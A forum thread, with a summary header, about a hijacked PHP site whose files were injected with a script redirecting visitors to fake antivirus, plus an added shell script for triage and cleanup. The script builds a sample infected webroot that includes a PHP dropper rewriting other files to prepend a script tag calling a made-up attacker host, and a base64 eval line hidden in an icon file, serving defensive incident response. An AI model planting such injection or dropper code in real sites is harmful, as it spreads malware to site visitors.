WEBSITE HIJACKED - Php code infected - HELP?


Discussion Overview

The discussion revolves around a website that has been hijacked, with PHP code infected by a malicious script that redirects visitors to a fake antivirus site. Participants explore the nature of the infection, potential vulnerabilities, and steps to mitigate the issue.

Discussion Character

  • Exploratory
  • Technical explanation
  • Debate/contested

Main Points Raised

  • Josh describes the infection affecting every PHP file on his website, including subdomains, with a malicious script added to the top of each file.
  • One participant asks what the subdomain-creation mechanism actually is and whether it comes from a trusted source.
  • One participant suggests searching for the specific PHP line added to identify others who may have faced similar issues.
  • Another participant points out that whatever has write access to the PHP files is either still compromised or still vulnerable, and recommends looking for recently modified non-PHP files, planted binaries, altered config files, or a single PHP file that rewrites the others and could reinfect the site.
  • There is a recommendation to examine HTTP access logs to trace the infection's origin and identify any relevant file accesses during that time.
  • One participant shares a link to a blog post indicating that similar infections have affected many GoDaddy shared servers, expressing frustration with the hosting provider's response.
  • Another participant presents two options: either delete everything and start anew or identify and fix the vulnerability before addressing the database issue.
  • A later reply urges Josh to shut down his site until the problem is resolved.

Areas of Agreement / Disagreement

Participants express varying opinions on how to handle the situation, with no consensus on the best course of action. Some focus on identifying vulnerabilities, while others suggest starting over.

Contextual Notes

There are unresolved questions regarding the source of the infection and the specific vulnerabilities that allowed it to occur. The discussion highlights the complexity of the situation, with multiple potential points of failure.

bigdawg723

Hey All,

I've got a major *$%#@ problem. I'm freaking out here.

Check this out.

On my website, I have a way to allow visitors... to become distributors and sell my product as well. When they become a distributor, it creates a subdomain for them and, basically, an exact copy of my website in that subdomain folder.

So... not only do I have my set of about 20 php pages and a solid 20+ php includes... I have to multiply those numbers by roughly... 50 distributors or more!

Here's my problem.

EVERY, not just a few... not just the pages (also includes, etc)... not just my root directory (also all subdomains)... EVERY PHP FILE has a new line of code at the very top that is a script pointing to a PHP file (oo.php) on another website that redirects every visitor to a new site, and it's one of those 'fake antivirus' programs that are, essentially, a virus in their own right.

When I first saw the redirect, I knew I was hijacked... but I assumed it was just 1 thing injected into my SQL databases... or a simple code change or file somewhere... but it is THOUSANDS of files... and yes, I could go ahead and remove that snippet of code from each php file... but I still wouldn't know where it came from, and I can only assume that the process which infected those pages still exists and would reinfect them all again in the very near future.

I'm begging you for help.

I know my contact form doesn't "close" the inputs or something... because it sends all contacts to the database table... and there's some major vulnerability there... but I couldn't find any entry in that database with any malicious code... perhaps it auto-deleted itself or something?

Please, I beg you, please lend a hand if you know anything about this.

Thank You,
Josh
 


it creates a subdomain for them and, basically, an exact copy of my website in that subdomain folder.
What is "it"? Is "it" from a trusted source? I am by no means an expert with these things, but that was the first thing that got my attention.
 


First up, do a search on Google for text snippets of the PHP line that was added. If someone else has been fighting this battle already, they'll be a good candidate to help solve the problem.

Otherwise, not enough information. Something on your site that has write access to your PHP files is either currently compromised, or is still vulnerable and was/is being attacked. What OS are you on? Do you have script access? Cron access? Who's your ISP? Has anything else been modified?

Step 1, look for non-PHP files that have been modified recently. Hopefully, you can use that to detect whether or not there's some binary file or otherwise that's sitting on your system that will re-infect you. That's dangerous. If you have some that look suspicious, quarantine them. Make them non-executable and non-readable, change the file name, whatever. There's a distinct possibility, if you've got other programs that have installed themselves, that they'll try to re-install themselves, so check any config files you have. Heck, compare them to backups with your ISP.

Step 2, look for PHP files that have changed that reference the evil site in question. That is, it's possibly just a single PHP file that has write access to other PHP files, and if that PHP file is executed again, you're re-infected.

Step 3, look at your HTTP access log. See what was happening around the time that you were infected, and examine whatever relevant files were accessed during that time. Chances are, the attack started with a web request, and that's one way of trying to narrow down the point of attack. Otherwise, if the infection started in some OTHER way, talk to your ISP.

DaveE
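The three steps above, worked through as an added shell example that is not code from the thread or from any of its participants. It builds a constructed sample webroot (root site plus one distributor copy, a planted non-PHP file, a PHP dropper, and a four-line access log) so every command can be checked before it is run on a real host. Assumptions: the injected line loads oo.php from an attacker host (the page does not name the host, so a made-up one is used), the incident time is taken from the mtime of the rewritten files, and shell access to the docroot exists, which is one of the questions DaveE asks.

```shell
#!/bin/sh
# Added example, not code from the thread. Walks DaveE's three steps against a
# constructed sample webroot. Assumed: the injected line loads oo.php from an
# attacker host (made-up here), the incident time comes from file mtimes, and
# the script runs with shell access to the docroot.
set -u

WEBROOT="${WEBROOT:-$(mktemp -d)}"
INJECTED='<script src="http://evil.example.invalid/oo.php"></script>'   # assumed
REF="$WEBROOT/.incident_ref"   # reference mtime for find -newer (portable)
LOG="$WEBROOT/logs/access.log"

# Constructed sample: root site plus one distributor copy, all prefixed with the
# injected line; a planted non-PHP file; a PHP dropper; and a small access log.
build_sample() {
    mkdir -p "$WEBROOT/includes" "$WEBROOT/sub/dist1/includes" "$WEBROOT/images" "$WEBROOT/logs"
    for f in index.php includes/db.php sub/dist1/index.php sub/dist1/includes/db.php; do
        printf '%s\n<?php\n// original content of %s\n' "$INJECTED" "$f" > "$WEBROOT/$f"
        touch -t 201005190300 "$WEBROOT/$f"          # all rewritten at 03:00
    done
    printf '<?php\n// untouched file\n' > "$WEBROOT/clean.php"
    printf 'RewriteEngine On\n' > "$WEBROOT/.htaccess"
    touch -t 201005010900 "$WEBROOT/clean.php" "$WEBROOT/.htaccess"
    printf '<?php eval(base64_decode("..."));\n' > "$WEBROOT/images/logo.ico"   # planted
    touch -t 201005190259 "$WEBROOT/images/logo.ico"
    cat > "$WEBROOT/sub/dist1/includes/cache.php" <<'EOF'
<?php
$p = '<script src="http://evil.example.invalid/oo.php"></script>';
foreach (glob('../../*.php') as $f) file_put_contents($f, $p . "\n" . file_get_contents($f));
EOF
    touch -t 201005190258 "$WEBROOT/sub/dist1/includes/cache.php"
    cat > "$LOG" <<'EOF'
203.0.113.7 - - [19/May/2010:02:57:41 +0000] "POST /contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [19/May/2010:02:58:02 +0000] "GET /sub/dist1/includes/cache.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.4 - - [19/May/2010:03:14:09 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.4 - - [18/May/2010:22:01:33 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
EOF
    touch -t 201005190250 "$REF"   # anything modified after 02:50 is suspect
}

# Step 1: non-PHP files modified after the reference time (planted binaries,
# edited configs). The log directory is skipped because it changes constantly.
modified_non_php() {
    find "$WEBROOT" -type f -newer "$REF" ! -name '*.php' ! -path "$WEBROOT/logs/*" | sort
}

# Step 2a: every PHP file that references the evil site.
infected_php() {
    find "$WEBROOT" -type f -name '*.php' -exec grep -l -F 'oo.php' {} + | sort
}
count_infected() { infected_php | wc -l | tr -d ' '; }

# Step 2b: infected files that also write files are the reinfection candidates.
dropper_candidates() {
    infected_php | while read -r f; do
        grep -l -E 'file_put_contents|fwrite|fopen' "$f" || true
    done
}

# Step 3: the access log around the incident, then a pivot from the requests
# that hit the dropper candidates to everything else those clients sent.
log_window() { grep -E "\[$1" "$LOG" || true; }   # $1 like '19/May/2010:0[23]:'
requests_to() { rel=${1#"$WEBROOT"}; grep -F "$rel " "$LOG" || true; }
requests_from_dropper_ips() {
    dropper_candidates | while read -r f; do requests_to "$f"; done |
        cut -d' ' -f1 | sort -u | while read -r ip; do
            grep -F "$ip - " "$LOG" || true
        done
}

# Containment: make suspect files unreadable and rename them out of *.php so the
# web server cannot execute them again, then strip the injected line in place
# (rewriting through the original inode keeps ownership and permissions).
quarantine() { for f in "$@"; do chmod 000 "$f" && mv "$f" "$f.quarantined"; done; }
clean_injected() {
    infected_php | while read -r f; do
        tmp="$f.tmp.$$"
        grep -v -x -F "$INJECTED" "$f" > "$tmp" && cat "$tmp" > "$f" && rm -f "$tmp"
    done
}

run_demo() {
    build_sample
    echo "== non-PHP files changed since the incident"; modified_non_php
    echo "== infected PHP files: $(count_infected)"
    echo "== dropper candidates"; dropper_candidates
    echo "== requests from the clients that fetched the droppers"; requests_from_dropper_ips
    quarantine "$WEBROOT/sub/dist1/includes/cache.php" "$WEBROOT/images/logo.ico"
    clean_injected
    echo "== infected PHP files after cleanup: $(count_infected)"
}
if [ "${1:-}" = "--demo" ]; then run_demo; fi
```

Run it as `sh triage.sh --demo` to see the three steps against the sample. On a real host, set WEBROOT to the docroot, replace INJECTED with the exact line copied from one of the infected files, create the reference file with `touch -t` set just before the earliest infected mtime (`ls -lt` across the docroot shows it), and point LOG at the real access log. The pivot in step 3 is the useful part: in the constructed log the client that fetched the dropper had POSTed to the contact form a minute earlier, which is the kind of trail the log search is meant to surface; the real vector can only be read from the real log. Cleaning files without quarantining the dropper and closing the hole just schedules the next reinfection, which is why the later replies say to take the site down first.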
 


I searched for that PHP thread... found it!

http://blog.sucuri.net/2010/05/lots-of-sites-reinfected-now-using.html

Apparently this happened to "hundreds" of GoDaddy shared servers... I assume thousands!

I've never seen this before... I have a few words for GoDaddy... but they don't care, maybe time for a host switch? They said it was due to outdated versions of WordPress... mine was fully up-to-date at the time of the attack. BS

Thanks for the quick replies though!

I love this forum - more helpful than any PHP-only forum I've found thus far.
 


You have really 2 ways to go with this:

1) Delete everything and start from new
2) Figure out how and where the vulnerability occurred, fix it, and then go about fixing the database issue.

Good luck.
 


Please tell me that you have shut down your site until you fix the problem.
 
